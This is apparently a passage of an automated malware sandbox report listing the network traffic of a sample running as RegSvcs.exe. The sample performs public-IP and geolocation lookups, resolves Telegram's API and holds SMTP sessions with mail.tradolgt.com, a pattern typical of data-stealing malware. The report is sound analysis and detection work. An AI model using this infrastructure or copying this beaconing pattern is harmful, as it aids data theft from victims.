                                      Jul 31, 2024 09:00:54.704212904 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:54.867598057 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:54.867904902 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:00:54.872759104 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.022422075 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.022749901 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:00:55.027693033 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.216949940 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.217334986 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:00:55.222239017 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.371550083 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.372279882 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:00:55.372369051 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:00:55.372369051 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:00:55.372369051 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:00:55.377207994 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.377458096 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.589685917 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.630624056 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:02:32.662328959 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:02:32.667176008 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:02:32.821460962 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:02:32.822019100 CEST49725587192.168.2.7208.91.199.115

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jul 31, 2024 09:00:29.324629068 CEST6364053192.168.2.71.1.1.1
                                      Jul 31, 2024 09:00:29.332420111 CEST53636401.1.1.1192.168.2.7
                                      Jul 31, 2024 09:00:31.636756897 CEST5643353192.168.2.71.1.1.1
                                      Jul 31, 2024 09:00:31.644354105 CEST53564331.1.1.1192.168.2.7
                                      Jul 31, 2024 09:00:45.380357027 CEST6496753192.168.2.71.1.1.1
                                      Jul 31, 2024 09:00:45.392929077 CEST53649671.1.1.1192.168.2.7
                                      Jul 31, 2024 09:00:52.640337944 CEST5067153192.168.2.71.1.1.1
                                      Jul 31, 2024 09:00:53.022254944 CEST53506711.1.1.1192.168.2.7

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jul 31, 2024 09:00:29.324629068 CEST192.168.2.71.1.1.10xfd6eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                      Jul 31, 2024 09:00:31.636756897 CEST192.168.2.71.1.1.10x4857Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                      Jul 31, 2024 09:00:45.380357027 CEST192.168.2.71.1.1.10xbf1fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                      Jul 31, 2024 09:00:52.640337944 CEST192.168.2.71.1.1.10x80afStandard query (0)mail.tradolgt.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jul 31, 2024 09:00:29.332420111 CEST1.1.1.1192.168.2.70xfd6eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                      Jul 31, 2024 09:00:29.332420111 CEST1.1.1.1192.168.2.70xfd6eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                      Jul 31, 2024 09:00:29.332420111 CEST1.1.1.1192.168.2.70xfd6eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                      Jul 31, 2024 09:00:29.332420111 CEST1.1.1.1192.168.2.70xfd6eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                      Jul 31, 2024 09:00:29.332420111 CEST1.1.1.1192.168.2.70xfd6eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                      Jul 31, 2024 09:00:29.332420111 CEST1.1.1.1192.168.2.70xfd6eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                      Jul 31, 2024 09:00:31.644354105 CEST1.1.1.1192.168.2.70x4857No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                      Jul 31, 2024 09:00:31.644354105 CEST1.1.1.1192.168.2.70x4857No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                      Jul 31, 2024 09:00:45.392929077 CEST1.1.1.1192.168.2.70xbf1fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                      Jul 31, 2024 09:00:53.022254944 CEST1.1.1.1192.168.2.70x80afNo error (0)mail.tradolgt.com208.91.199.115A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • reallyfreegeoip.org
                                      • api.telegram.org
                                      • checkip.dyndns.org

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.749702132.226.247.73801104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 31, 2024 09:00:29.344671011 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 31, 2024 09:00:30.024816990 CEST320INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:29 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: c67a5f3b0bcf1fd104caaa12147eb3e3
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                      Jul 31, 2024 09:00:30.030251980 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 31, 2024 09:00:31.588428020 CEST320INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:31 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 43b09c3307ec48defbab5e5fa06ab9a4
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                      Jul 31, 2024 09:00:31.588527918 CEST320INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:31 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 43b09c3307ec48defbab5e5fa06ab9a4
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                      Jul 31, 2024 09:00:32.315922976 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 31, 2024 09:00:32.522100925 CEST320INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:32 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 9e58a46c23ca5f9982a2206d48fff44f
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.749705132.226.247.73801104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 31, 2024 09:00:33.129033089 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 31, 2024 09:00:33.814076900 CEST320INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:33 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 67f088a32d4ca5954f68d8594010c4ba
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.749707132.226.247.73801104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 31, 2024 09:00:34.452337980 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 31, 2024 09:00:35.121427059 CEST320INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:35 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 1ae59dace1e706a79de7077e25398cd5
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.749709132.226.247.73801104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 31, 2024 09:00:35.738308907 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 31, 2024 09:00:36.434078932 CEST320INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:36 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: b662c4a382a15b71e5412f23a42e379e
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.749711132.226.247.73801104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 31, 2024 09:00:37.067643881 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 31, 2024 09:00:38.744698048 CEST320INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:38 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: bb88745a1c4ca6883f7a102499dce4ef
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.749713132.226.247.73801104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 31, 2024 09:00:40.394596100 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 31, 2024 09:00:42.133896112 CEST320INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:42 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 2ceb5114c1191e53b5761a7258cfe290
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.749715132.226.247.73801104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 31, 2024 09:00:42.764475107 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 31, 2024 09:00:43.436903000 CEST320INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:43 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 3168c859586578ab669cd8fccc9e0699
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.749717132.226.247.73801104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 31, 2024 09:00:44.039377928 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 31, 2024 09:00:44.709991932 CEST320INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:44 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: cc54f7498182d22d6e3242a457aa77c1
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.749703188.114.96.34431104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-31 07:00:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-31 07:00:32 UTC715INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:32 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5610
                                      Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9tUQiO9n16vtdwyFgAMIrGLKT3Elu%2FrFAbZjp7mtRUX5idiOd3ti%2FPg%2BmCsDem%2BRyT%2BKe8fXktTtqaOE4fLX47HE0oeBKPnn9f%2FV3ul6gGTkaHUgJ%2BWJymGUwS%2FNEEWaxfb1U4R6"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8abbb6458d4f41ec-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-31 07:00:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-31 07:00:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.749704188.114.96.34431104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-31 07:00:32 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-07-31 07:00:33 UTC701INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:33 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5611
                                      Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gwQsINqMtOfgxjugvYErR80AuLjDGacVctOorNmBzAKNtvfadiVct4JyjUfAEYi2sA49Zg3Eb0WwkPWHWKpRDL6%2F6AxcphFkne8LoUcc2N0kNq5CQQeVHcJLcBv7HiOJBK0tgBe9"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8abbb64aaabc7c99-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-31 07:00:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-31 07:00:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.749706188.114.96.34431104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-31 07:00:34 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-31 07:00:34 UTC711INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:34 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5612
                                      Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKDlIPwyzddha3dlyRuGGegt%2FWbFpCCQ3wx3OnINWuf%2F9QnXuIQvbBPaEOLpBtM%2BdojVAp%2BZrk86zOo3%2FddoByjaBCJphhBwd76cp8wQrKfuBUQBqfSAGcrP5X%2BiP2PzplWIn9jW"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8abbb652d8a67280-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-31 07:00:34 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-31 07:00:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.749708188.114.96.34431104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-31 07:00:35 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-31 07:00:35 UTC707INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:35 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
